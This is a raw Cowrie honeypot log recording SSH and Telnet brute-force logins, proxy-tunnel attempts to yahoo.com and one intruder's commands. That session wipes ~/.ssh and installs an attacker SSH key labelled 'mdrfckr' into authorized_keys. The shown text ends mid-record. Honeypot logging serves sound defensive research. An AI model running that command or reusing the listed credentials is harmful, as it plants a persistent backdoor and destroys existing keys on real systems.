{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:49:10.027442Z","src_ip":"212.227.125.160","session":"9bc142e0e03b"}
{"eventid":"cowrie.session.closed","duration":120.00077533721924,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:49:10.270704Z","src_ip":"212.227.125.160","session":"d208e8171b86"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60248,"dst_ip":"1.2.3.4","dst_port":22,"session":"661ca17690fa","protocol":"ssh","message":"New connection: 213.209.150.239:60248 (1.2.3.4:22) [session: 661ca17690fa]","sensor":"my-vps","timestamp":"2025-08-26T08:49:44.395012Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:49:44.395901Z","src_ip":"213.209.150.239","session":"661ca17690fa"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T08:49:44.443424Z","src_ip":"213.209.150.239","session":"661ca17690fa"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:49:44.679947Z","src_ip":"213.209.150.239","session":"661ca17690fa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":12384,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:12384","sensor":"my-vps","timestamp":"2025-08-26T08:49:44.727901Z","session":"661ca17690fa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T08:49:44.775035Z","src_ip":"213.209.150.239","session":"661ca17690fa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":1197,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:1197","sensor":"my-vps","timestamp":"2025-08-26T08:49:44.909600Z","session":"661ca17690fa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T08:49:44.956919Z","src_ip":"213.209.150.239","session":"661ca17690fa"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:49:45.005700Z","src_ip":"213.209.150.239","session":"661ca17690fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55180,"dst_ip":"1.2.3.4","dst_port":22,"session":"63b188e6d517","protocol":"ssh","message":"New connection: 212.227.235.229:55180 (1.2.3.4:22) [session: 63b188e6d517]","sensor":"my-vps","timestamp":"2025-08-26T08:50:56.916415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:50:56.917370Z","src_ip":"212.227.235.229","session":"63b188e6d517"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:50:57.158906Z","src_ip":"212.227.235.229","session":"63b188e6d517"}
{"eventid":"cowrie.login.success","username":"root","password":"sandra","message":"login attempt [root/sandra] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:50:58.170594Z","src_ip":"212.227.235.229","session":"63b188e6d517"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:50:58.744079Z","src_ip":"212.227.235.229","session":"63b188e6d517"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T08:50:58.745297Z","src_ip":"212.227.235.229","session":"63b188e6d517"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T08:50:58.747550Z","src_ip":"212.227.235.229","session":"63b188e6d517"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:50:58.991356Z","src_ip":"212.227.235.229","session":"63b188e6d517"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:50:59.544482Z","src_ip":"212.227.235.229","session":"63b188e6d517"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T08:50:59.545177Z","src_ip":"212.227.235.229","session":"63b188e6d517"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T08:50:59.788889Z","src_ip":"212.227.235.229","session":"63b188e6d517"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:50:59.789772Z","src_ip":"212.227.235.229","session":"63b188e6d517"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50198,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba7a7c2ebf31","protocol":"ssh","message":"New connection: 212.227.235.229:50198 (1.2.3.4:22) [session: ba7a7c2ebf31]","sensor":"my-vps","timestamp":"2025-08-26T08:51:00.020925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:51:00.021812Z","src_ip":"212.227.235.229","session":"ba7a7c2ebf31"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:51:00.257681Z","src_ip":"212.227.235.229","session":"ba7a7c2ebf31"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T08:51:01.240465Z","src_ip":"212.227.235.229","session":"ba7a7c2ebf31"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:51:02.478906Z","src_ip":"212.227.235.229","session":"ba7a7c2ebf31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50208,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c2a931767c5","protocol":"ssh","message":"New connection: 212.227.235.229:50208 (1.2.3.4:22) [session: 0c2a931767c5]","sensor":"my-vps","timestamp":"2025-08-26T08:51:02.713682Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:51:02.714647Z","src_ip":"212.227.235.229","session":"0c2a931767c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:51:02.949575Z","src_ip":"212.227.235.229","session":"0c2a931767c5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:51:03.931252Z","src_ip":"212.227.235.229","session":"0c2a931767c5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:51:04.168392Z","src_ip":"212.227.235.229","session":"0c2a931767c5"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:51:04.171145Z","src_ip":"212.227.235.229","session":"63b188e6d517"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:52:10.036229Z","src_ip":"212.227.125.160","session":"9bc142e0e03b"}
{"eventid":"cowrie.session.closed","duration":180.12649750709534,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:52:10.041450Z","src_ip":"212.227.125.160","session":"9bc142e0e03b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58210,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f6b5918564e","protocol":"ssh","message":"New connection: 212.227.235.229:58210 (1.2.3.4:22) [session: 9f6b5918564e]","sensor":"my-vps","timestamp":"2025-08-26T08:53:23.381283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:53:23.382699Z","src_ip":"212.227.235.229","session":"9f6b5918564e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:53:23.645130Z","src_ip":"212.227.235.229","session":"9f6b5918564e"}
{"eventid":"cowrie.login.success","username":"root","password":"Sp@123456","message":"login attempt [root/Sp@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:53:24.747412Z","src_ip":"212.227.235.229","session":"9f6b5918564e"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":59240,"dst_ip":"1.2.3.4","dst_port":23,"session":"b903df8c7508","protocol":"telnet","message":"New connection: 79.124.8.120:59240 (1.2.3.4:23) [session: b903df8c7508]","sensor":"my-vps","timestamp":"2025-08-26T08:53:43.402616Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:53:43.442704Z","src_ip":"79.124.8.120","session":"b903df8c7508"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:53:43.464693Z","src_ip":"79.124.8.120","session":"b903df8c7508"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52712,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cde687bcddc","protocol":"ssh","message":"New connection: 217.72.205.35:52712 (1.2.3.4:22) [session: 9cde687bcddc]","sensor":"my-vps","timestamp":"2025-08-26T08:53:58.409350Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:53:58.410522Z","src_ip":"217.72.205.35","session":"9cde687bcddc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37644,"dst_ip":"1.2.3.4","dst_port":22,"session":"2438d8fae239","protocol":"ssh","message":"New connection: 212.227.235.229:37644 (1.2.3.4:22) [session: 2438d8fae239]","sensor":"my-vps","timestamp":"2025-08-26T08:54:50.220819Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T08:54:50.221514Z","src_ip":"212.227.235.229","session":"2438d8fae239"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T08:54:50.350864Z","src_ip":"212.227.235.229","session":"2438d8fae239"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T08:54:50.939866Z","src_ip":"212.227.235.229","session":"2438d8fae239"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:54:52.067748Z","src_ip":"212.227.235.229","session":"2438d8fae239"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52126,"dst_ip":"1.2.3.4","dst_port":23,"session":"89569528efa0","protocol":"telnet","message":"New connection: 212.227.125.160:52126 (1.2.3.4:23) [session: 89569528efa0]","sensor":"my-vps","timestamp":"2025-08-26T08:54:54.543079Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43911,"dst_ip":"1.2.3.4","dst_port":23,"session":"87b49d6289ed","protocol":"telnet","message":"New connection: 212.227.235.229:43911 (1.2.3.4:23) [session: 87b49d6289ed]","sensor":"my-vps","timestamp":"2025-08-26T08:54:57.261742Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44337,"dst_ip":"1.2.3.4","dst_port":22,"session":"1140a9abe8df","protocol":"ssh","message":"New connection: 212.227.235.229:44337 (1.2.3.4:22) [session: 1140a9abe8df]","sensor":"my-vps","timestamp":"2025-08-26T08:55:00.136804Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:55:00.138278Z","src_ip":"212.227.235.229","session":"1140a9abe8df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44655,"dst_ip":"1.2.3.4","dst_port":22,"session":"1728c434f78e","protocol":"ssh","message":"New connection: 212.227.235.229:44655 (1.2.3.4:22) [session: 1728c434f78e]","sensor":"my-vps","timestamp":"2025-08-26T08:55:00.316704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:55:00.317575Z","src_ip":"212.227.235.229","session":"1728c434f78e"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512",